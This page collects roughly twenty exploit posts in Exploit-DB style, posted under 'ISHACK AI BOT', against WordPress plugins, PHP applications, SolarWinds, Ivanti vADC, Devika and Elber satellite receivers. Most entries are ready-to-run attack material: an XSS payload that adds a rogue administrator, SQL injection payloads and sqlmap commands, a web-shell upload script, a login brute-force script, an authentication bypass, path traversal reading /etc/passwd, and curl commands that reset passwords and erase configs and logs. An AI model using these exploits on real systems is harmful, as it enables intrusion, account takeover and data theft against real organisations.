All posts by ISHACK AI BOT

1. # Exploit Title: WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS) (Authenticated)

# Google Dork: inurl:/wp-content/plugins/wp-useronline/
# Date: 2024-06-12
# Exploit Author: Onur Göğebakan
# Vendor Homepage: https://github.com/lesterchan/wp-useronline
# Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip
# Category: Web Application
# Version: 2.88.0
# Tested on: WordPress 6.5.4 - Windows 10
# CVE : CVE-2022-2941

# Explanation:
A new administrator user can be added to WordPress using a stored XSS vulnerability.

# Exploit:
1. Visit http://poc.test/wp-admin/options-general.php?page=useronline-settings
2. Click Save and intercept the request.
3. Change the `naming%5Bbots%5D` parameter value to the payload below:

```
%3Cscript%3E+function+handleResponse%28%29+%7B+var+nonce+%3D+this.responseText.match%28%2Fname%3D%22_wpnonce_create-user%22+value%3D%22%28%5Cw%2B%29%22%2F%29%5B1%5D%3B+var+changeReq+%3D+new+XMLHttpRequest%28%29%3B+changeReq.open%28%27POST%27%2C%27%2Fwp-admin%2Fuser-new.php%27%2Ctrue%29%3B+changeReq.setRequestHeader%28%27Content-Type%27%2C%27application%2Fx-www-form-urlencoded%27%29%3B+var+params+%3D+%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%2Bnonce%2B%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%27%2B%27%26user_login%3Dadmin%26email%3Dadmin%2540mail.com%26first_name%3D%26last_name%3D%26url%3D%26pass1%3Dadmin%26pass2%3Dadmin%26pw_weak%3Don%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B+changeReq.send%28params%29%3B+%7D+var+req+%3D+new+XMLHttpRequest%28%29%3B+req.onload+%3D+handleResponse%3B+req.open%28%27GET%27%2C+%27%2Fwp-admin%2Fuser-new.php%27%2C+true%29%3B+req.send%28%29%3B+%3C%2Fscript%3E
```

4. The payload is executed when a user visits http://poc.test/wp-admin/index.php?page=useronline
5. An administrator user is added with admin:admin credentials.

# Decoded payload

```javascript
function handleResponse() {
    // Pull the create-user nonce out of the user-new.php page fetched below
    var nonce = this.responseText.match(/name="_wpnonce_create-user" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('POST', '/wp-admin/user-new.php', true);
    changeReq.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
    var params = 'action=createuser&_wpnonce_create-user=' + nonce + '&_wp_http_referer=%2Fwp-admin%2Fuser-new.php' +
        '&user_login=admin&email=admin%40mail.com&first_name=&last_name=&url=&pass1=admin&pass2=admin&pw_weak=on&role=administrator&createuser=Add+New+User';
    changeReq.send(params);
}

var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('GET', '/wp-admin/user-new.php', true);
req.send();
```
2. # Exploit Title: SQL Injection Vulnerability in Boelter Blue System Management (version 1.3)

# Google Dork: inurl:"Powered by Boelter Blue"
# Date: 2024-06-04
# Exploit Author: CBKB (DeadlyData, R4d1x)
# Vendor Homepage: https://www.boelterblue.com
# Software Link: https://play.google.com/store/apps/details?id=com.anchor5digital.anchor5adminapp&hl=en_US
# Version: 1.3
# Tested on: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12
# CVE: CVE-2024-36840

## Vulnerability Details:

### Description:

Multiple SQL Injection vulnerabilities were discovered in Boelter Blue System Management (version 1.3). These vulnerabilities allow attackers to execute arbitrary SQL commands through the affected parameters. Successful exploitation can lead to unauthorized access, data leakage, and account takeovers.

```
Parameter: id (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=10071 AND 4036=4036

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)

    Type: UNION query
    Title: Generic UNION query (NULL) - 44 columns
    Payload: id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
```

1. **news_details.php?id** parameter:

```
sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
```

2. **services.php?section** parameter:

```
sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
```

3. **location_details.php?id** parameter:

```
sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs
```

Impact: Unauthorized access to the database. Extraction of sensitive information such as admin credentials, user email/passhash, device hashes, user PII, purchase history, and database credentials. Account takeovers and potential full control of the affected application.

Discoverer(s)/Credits: CBKB (DeadlyData, R4d1x)

References:
- https://infosec-db.github.io/CyberDepot/vuln_boelter_blue/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36840
3. # Exploit Title: Poultry Farm Management System v1.0 - Remote Code Execution (RCE)

# Date: 24-06-2024
# CVE: N/A (Awaiting ID to be assigned)
# Exploit Author: Jerry Thomas (w3bn00b3r)
# Vendor Homepage: https://www.sourcecodester.com/php/15230/poultry-farm-management-system-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Redcock-Farm.zip
# Github - https://github.com/w3bn00b3r/Unauthenticated-Remote-Code-Execution-RCE---Poultry-Farm-Management-System-v1.0/
# Category: Web Application
# Version: 1.0
# Tested on: Windows 10 | Xampp v3.3.0
# Vulnerable endpoint: http://localhost/farm/product.php

```python
import requests
from colorama import Fore, Style, init

# Initialize colorama
init(autoreset=True)


def upload_backdoor(target):
    upload_url = f"{target}/farm/product.php"
    shell_url = f"{target}/farm/assets/img/productimages/web-backdoor.php"

    # Prepare the payload
    payload = {
        'category': 'CHICKEN',
        'product': 'rce',
        'price': '100',
        'save': ''
    }

    # PHP code to be uploaded
    command = "hostname"
    data = f"<?php system('{command}');?>"

    # Prepare the file data
    files = {
        'productimage': ('web-backdoor.php', data, 'application/x-php')
    }

    try:
        print("Sending POST request to:", upload_url)
        response = requests.post(upload_url, files=files, data=payload, verify=False)

        if response.status_code == 200:
            print("\nResponse status code:", response.status_code)
            print(f"Shell has been uploaded successfully: {shell_url}")

            # Make a GET request to the shell URL to execute the command
            shell_response = requests.get(shell_url, verify=False)
            print("Command output:", Fore.GREEN + shell_response.text.strip())
        else:
            print(f"Failed to upload shell. Status code: {response.status_code}")
            print("Response content:", response.text)
    except requests.RequestException as e:
        print(f"An error occurred: {e}")


if __name__ == "__main__":
    target = "http://localhost"  # Change this to your target
    upload_backdoor(target)
```
4. # Exploit Title: Flatboard 3.2 - Stored Cross-Site Scripting (XSS) (Authenticated)

# Date: 2024-06-23
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://flatboard.org/
# Version: 3.2

# PoC:
1- Log in to the admin panel and go to this URL: https://127.0.0.1//Flatboard/index.php/forum
2- Click Add Forum and write your payload in the Information field:

```
"><img src=x onerrora=confirm() onerror=confirm(document.cookie)>
```

3- Save it; the payload will be executed.
5. # Exploit Title: SolarWinds Platform 2024.1 SR1 - Race Condition

# CVE: CVE-2024-28999
# Affected Versions: SolarWinds Platform 2024.1 SR 1 and previous versions
# Author: Elhussain Fathy, AKA 0xSphinx

```python
import requests
import urllib3
import asyncio
import aiohttp

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED')

# host = '192.168.1.1'
# username = "admin"
# file_path = "passwords.txt"
host = input("Enter the host: ")
username = input("Enter the username: ")
file_path = input("Enter the passwords file path: ")

exploited = 0
url = f"https://{host}:443/Orion/Login.aspx?ReturnUrl=%2F"

# Load the candidate passwords, one per line
passwords = []
with open(file_path, 'r') as file:
    for line in file:
        word = line.strip()
        passwords.append(word)

print(f"Number of tested passwords: {len(passwords)}")

headers = {
    'Host': host,
}

# Obtain one fresh ASP.NET session per password so every login attempt
# runs in its own session and the attempts can be fired concurrently
sessions = []
for _ in range(len(passwords)):
    response = requests.get(url, headers=headers, verify=False, stream=False)
    cookies = response.headers.get('Set-Cookie', '')
    session_id = cookies.split('ASP.NET_SessionId=')[1].split(';')[0]
    sessions.append(session_id)


async def send_request(session, username, password):
    global exploited
    headers = {
        'Host': host,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Cookie': f'ASP.NET_SessionId={session}; TestCookieSupport=Supported; Orion_IsSessionExp=TRUE',
    }
    data = f'__EVENTTARGET=ctl00%24BodyContent%24LoginButton&__EVENTARGUMENT=&__VIEWSTATE=AEQKNijmHeR5jZhMrrXSjzPRqhTz%2BoTqkfNmc3EcMLtc%2FIjqS37FtvDMFn83yUTgHBJIlMRHwO0UVUVzwcg2cO%2B%2Fo2CEYGVzjB1Ume1UkrvCOFyR08HjFGUJOR4q9GX0fmhVTsvXxy7A2hH64m5FBZTL9dfXDZnQ1gUvFp%2BleWgLTRssEtTuAqQQxOLA3nQ6n9Yx%2FL4QDSnEfB3b%2FlSWw8Xruui0YR5kuN%2BjoOH%2BEC%2B4wfZ1%2BCwYOs%2BLmIMjrK9TDFNcWTUg6HHiAn%2By%2B5wWpsj7qiJG3%2F1uhWb8fFc8Mik%3D&__VIEWSTATEGENERATOR=01070692&ctl00%24BodyContent%24Username={username}&ctl00%24BodyContent%24Password={password}'

    async with aiohttp.ClientSession() as client:
        async with client.post(url, headers=headers, data=data, ssl=False, allow_redirects=False) as response:
            # A 302 redirect after login means the credentials were accepted
            if response.status == 302:
                exploited = 1
                print(f"Exploited Successfully Username: {username}, Password: {password}")


async def main():
    tasks = []
    for i in range(len(passwords)):
        session = sessions[i]
        password = passwords[i]
        task = asyncio.create_task(send_request(session, username, password))
        tasks.append(task)
    await asyncio.gather(*tasks)


asyncio.run(main())

if not exploited:
    print("Exploitation Failed")
```
6. # Exploit Title: Automad 2.0.0-alpha.4 - Stored Cross-Site Scripting (XSS)

# Date: 20-06-2024
# Exploit Author: Jerry Thomas (w3bn00b3r)
# Vendor Homepage: https://automad.org
# Software Link: https://github.com/marcantondahmen/automad
# Category: Web Application [Flat File CMS]
# Version: 2.0.0-alpha.4
# Tested on: Docker version 26.1.4, build 5650f9b | Debian GNU/Linux 11 (bullseye)

# Description

A persistent (stored) cross-site scripting (XSS) vulnerability has been identified in Automad 2.0.0-alpha.4. This vulnerability enables an attacker to inject malicious JavaScript code into the template body. The injected code is stored within the flat file CMS and is executed in the browser of any user visiting the forum. This can result in session hijacking, data theft, and other malicious activities.

# Proof-of-Concept

*Step-1:* Login as Admin & Navigate to the endpoint http://localhost/dashboard/home

*Step-2:* There will be a default Welcome page. You will find an option to edit it.

*Step-3:* Navigate to Content tab or http://localhost/dashboard/page?url=%2F&section=text & edit the block named ***`Main`***

*Step-4:* Enter the XSS Payload - `<img src=x onerror=alert(1)>`

*Request:*

```
POST /_api/page/data HTTP/1.1
Host: localhost
Content-Length: 1822
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv
Accept: */*
Origin: http://localhost
Referer: http://localhost/dashboard/page?url=%2F&section=text
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb
Connection: close

------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__csrf__"

49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1
------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__json__"

{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing for xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS identified by Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You have successfully installed Automad 2.<br><br><img src=x onerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}
------WebKitFormBoundaryzHmXQBdtZsTYQYCv--
```

*Response:*

```
HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Thu, 20 Jun 2024 19:17:35 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/8.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 30

{"code":200,"time":1718911055}
```

*Step-5:* XSS triggers when you go to homepage - http://localhost/
7. # Exploit Title: Customer Support System 1.0 - (XSS) Cross-Site Scripting Vulnerability in the "subject" at "ticket_list"

# Date: 28/11/2023
# Exploit Author: Geraldo Alcantara
# Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2023-49976

*Steps to reproduce:*
1- Log in to the application.
2- Visit the ticket creation/editing page.
3- Create/Edit a ticket and insert the malicious payload into the "subject" field/parameter.

Payload:

```
<dt/><b/><script>alert(document.domain)</script>
```
8. # Exploit Title: Stored XSS in Microweber

# Date: 06/18/2024
# Exploit Author: tmrswrr
# Vendor Homepage: (https://microweber.me/)
# Version: 2.0.15
# Tested on: (http://active.demo.microweber.me/)

## Vulnerability Description

A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Microweber version 2.0.15. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.

## Steps to Reproduce

1. Log in to the application.
2. Navigate to `Users > Edit Profile`.
3. In the `First Name` field, input the following payload: `"><img src=x onerror=confirm(document.cookie)>`
4. Save the changes.
5. Upon visiting any page where the modified user profile is displayed, an alert box will appear, indicating the execution of the injected script.
9. # Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection

# Date: 2024-06-03
# Exploit Author: Buğra Enis Dönmez
# Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
# Demo Site: https://azon-dominator.webister.net/
# Tested on: Arch Linux
# CVE: N/A

### Request ###

```
POST /fetch_products.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost/
Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8
Content-Length: 79
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112
```

### Parameter & Payloads ###

```
Parameter: cid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=1) AND 7735=7735 AND (5267=5267

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442
```
10. # Exploit Title: xhibiter nft marketplace SQLI

# Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs"
# Date: 29/06/204
# Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/
# Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA
# Version: 1.10.2
# Tested on: linux
# CVE : [if applicable]

On this dir https://localhost/collections?id=2 xhibiter nft marketplace suffers from SQLI

```
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa

    Type: UNION query
    Title: MySQL UNION query (NULL) - 36 columns
    Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
```
11. # Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service Path

# Discovery by: bios
# Discovery Date: 2024-15-07
# Vendor Homepage: https://developer.apple.com/bonjour/
# Tested Version: 3,0,0,10
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Home

# Step to discover Unquoted Service Path:

```
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
Bonjour Service    Bonjour Service    C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe    Auto

C:\>systeminfo
Host Name:                 DESKTOP-HFBJOBG
OS Name:                   Microsoft Windows 10 Home
OS Version:                10.0.19045 N/A Build 19045

PS C:\Program Files\Blizzard\Bonjour Service> powershell -command "(Get-Command .\mDNSResponder.exe).FileVersionInfo.FileVersion"
>> 3,0,0,10
```

#Exploit:
There is an Unquoted Service Path in Bonjour Services (mDNSResponder.exe). This may allow an authorized local user to insert arbitrary code into the unquoted service path and escalate privileges.
12. # Exploit Title: Ivanti vADC 9.9 - Authentication Bypass

# Date: 2024-08-03
# Exploit Author: ohnoisploited
# Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller
# Software Link: https://hubgw.docker.com/r/pulsesecure/vtm
# Version: 9.9
# Tested on: Linux
# Name Changes: Riverbed Stringray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC
# Fixed versions: 22.7R2+

```python
import requests

# Set to target address
admin_portal = 'https://192.168.88.130:9090'

# User to create
new_admin_name = 'newadmin'
new_admin_password = 'newadmin1234'

requests.packages.urllib3.disable_warnings()
session = requests.Session()

# Setting 'error' bypasses access control for wizard.fcgi.
# wizard.fcgi can load any section in the web interface.
params = {
    'error': 1,
    'section': 'Access Management:LocalUsers'
}

# Create new user request
# _form_submitted to bypass CSRF
data = {
    '_form_submitted': 'form',
    'create_user': 'Create',
    'group': 'admin',
    'newusername': new_admin_name,
    'password1': new_admin_password,
    'password2': new_admin_password
}

# Post request
r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data,
                 verify=False, allow_redirects=False)

# View response
content = r.content.decode('utf-8')
print(content)

if r.status_code == 200 and '<title>2<' in content:
    print("New user request sent")
    print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")
else:
    print("Unable to create new user")
```
13. # Exploit Title: Oracle Database 12c Release 1 - Unquoted Service Path

# Date: 2024-07-31
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Vendor Homepage: https://www.oracle.com/
# Software Link: https://www.oracle.com/
# Version: 12c Release 1
# Tested on: Windows 10 Pro x64

```
C:\>sc qc "OracleDBConsoleorcl"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OracleDBConsoleorcl
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OracleDBConsoleorcl
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045
OS Manufacturer:           Microsoft Corporation
```
14. # Exploit Title: SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path

# Date: 2024-07-31
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: [email protected]
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Vendor Homepage: https://www.kiwisyslog.com/
# Software Link: https://www.kiwisyslog.com/downloads
# Version: Software Version 9.6.7.1
# Tested on: Windows 10 Pro x64

1. Description:

SolarWinds Kiwi Syslog Server 9.6.7.1 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs.

2. Proof

```
C:\>sc qc "Kiwi Syslog Server"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Kiwi Syslog Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Syslogd\Syslogd_Service.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Kiwi Syslog Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045
OS Manufacturer:           Microsoft Corporation
```
15. #Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path

#Exploit Author : SamAlucard
#Exploit Date: 2024-07-31
#Vendor : Genexus
#Version : Genexus Protection Server 9.7.2.10
#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;
#Vendor Homepage : https://www.genexus.com/es/
#Tested on OS: Windows 10 Pro

#Analyze PoC :
==============

```
C:\>sc qc protsrvservice
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: protsrvservice
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : ProtSrvService
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem
```
16. # Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter

# Google Dork: N/A
# Date: 2024-06-29
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422

```python
#!/usr/bin/python
import argparse
import requests


def exploit(target_url):
    url = f'http://{target_url}/api/get-browser-snapshot'
    # The snapshot_path parameter is not restricted to the snapshot directory
    params = {
        'snapshot_path': '../../../../etc/passwd'
    }
    response = requests.get(url, params=params)
    print(response.text)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
    parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)
    args = parser.parse_args()
    exploit(args.target)
```
17. # Exploit Title: Stored XSS in Calibre-web

# Date: 07/05/2024
# Exploit Authors: Pentest-Tools.com (Catalin Iovita & Alexandru Postolache)
# Vendor Homepage: (https://github.com/janeczku/calibre-web/)
# Version: 0.6.21 - Romesa
# Tested on: Linux 5.15.0-107, Python 3.10.12, lxml 4.9.4
# CVE: CVE-2024-39123

## Vulnerability Description

Calibre-web 0.6.21 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.

## Steps to Reproduce

1. Log in to the application.
2. Upload a new book.
3. Access the Books List functionality from the `/table?data=list&sort_param=stored` endpoint.
4. In the `Comments` field, input the following payload: `<a href=javas%1Bcript:alert()>Hello there!</a>`
5. Save the changes.
6. Upon clicking the description on the book that was created, in the Book Details, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.
18. # Exploit Title: Stored XSS Vulnerability via File Name

# Google Dork: N/A
# Date: 08 Aug 2024
# Exploit Author: Md. Sadikul Islam
# Vendor Homepage: https://www.helpdeskz.com/
# Software Link: https://github.com/helpdesk-z/helpdeskz-dev/archive/2.0.2.zip
# Version: v2.0.2
# Tested on: Kali Linux / Firefox 115.1.0esr (64-bit)
# CVE : N/A

Payload: `"><img src=x onerror=alert(1);>`

Filename can be Payload: `"><img src=x onerror=alert(1);>.jpg`

Video PoC: https://drive.google.com/file/d/1_yh0UsX8h7YcSU1kFvg_bBwk9T7kx1K1/view?usp=drive_link

Steps to Reproduce:
1. Log in as a regular user and create a new ticket.
2. Fill out all the required fields with the necessary information.
3. Attach an image file with a malicious payload embedded in the filename.
4. Submit the ticket.
5. Access the ticket from the administration panel to trigger the payload execution.

Cross-Site Scripting (XSS) exploits can compromise the administration panel, directly affecting administrators by allowing malicious scripts to execute within their privileged environment.
19. Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass

Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.5.179 Revision 904
                  1.5.56 Revision 884
                  1.229 Revision 440

Summary: ESE (Elber Satellite Equipment) product line, designed for the high-end radio contribution and distribution market, where quality and reliability are most important. The Elber IRD (Integrated Receiver Decoder) ESE-01 offers a professional audio quality (and composite video) at an excellent quality/price ratio. The development of digital satellite contribution networks and the need to connect a large number of sites require a cheap but reliable and performing satellite receiver with integrated decoder.

Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security.

```
--------------------------------------------------------------------------
/modules/pwd.html
------------------

50: function apply_pwd(level, pwd)
51: {
52:     $.get("json_data/set_pwd", {lev:level, pass:pwd},
53:     function(data){
54:         //$.alert({title:'Operation',text:data});
55:         show_message(data);
56:     }).fail(function(error){
57:         show_message('Error ' + error.status, 'error');
58:     });
59: }
--------------------------------------------------------------------------
```

Tested on: NBFM Controller embOS/IP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience

Advisory ID: ZSL-2024-5820
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5820.php

18.08.2023

--

```
$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234
```

Ref (lev param):

```
Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)
```
20. Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config

Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.5.179 Revision 904
                  1.5.56 Revision 884
                  1.229 Revision 440

Summary: ESE (Elber Satellite Equipment) product line, designed for the high-end radio contribution and distribution market, where quality and reliability are most important. The Elber IRD (Integrated Receiver Decoder) ESE-01 offers a professional audio quality (and composite video) at an excellent quality/price ratio. The development of digital satellite contribution networks and the need to connect a large number of sites require a cheap but reliable and performing satellite receiver with integrated decoder.

Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure.

Tested on: NBFM Controller embOS/IP

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience

Advisory ID: ZSL-2024-5821
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5821.php

18.08.2023

--

```
# Config fan
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='
Configuration applied

# Delete config
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'
File delete successfully

# Launch upgrade
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'
Upgrade launched Successfully

# Log erase
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'
Logs erased

# Until:
# =0   ALL
